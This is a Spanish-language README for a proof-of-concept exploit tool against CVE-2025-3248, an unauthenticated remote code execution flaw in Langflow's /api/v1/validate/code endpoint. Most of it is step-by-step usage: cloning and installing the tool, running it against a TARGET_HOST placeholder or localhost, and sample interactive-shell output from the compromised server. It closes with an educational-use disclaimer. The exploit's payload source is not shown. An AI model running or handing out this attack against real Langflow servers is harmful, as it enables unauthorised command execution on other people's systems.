
Exploit para Langflow AI Remote Code Execution (No autenticado)
Este exploit apunta a una vulnerabilidad crítica de RCE sin autenticación (CVE-2025-3248) en Langflow AI. La vulnerabilidad permite a un atacante ejecutar comandos arbitrarios del sistema en el servidor objetivo a través del endpoint /api/v1/validate/code.
Esta herramienta de prueba de concepto (PoC) proporciona un shell interactivo para probar y demostrar el problema.
pip3 para instalar dependenciasgit clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
Se le presentará un shell interactivo:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit o quitEste proyecto está bajo la Licencia MIT — consulte el archivo LICENSE para más detalles.
Este software se proporciona únicamente con fines educativos y de investigación. El autor no asume ninguna responsabilidad por el uso indebido de este código. Úselo solo en sistemas de su propiedad o para los que tenga permiso explícito para probar.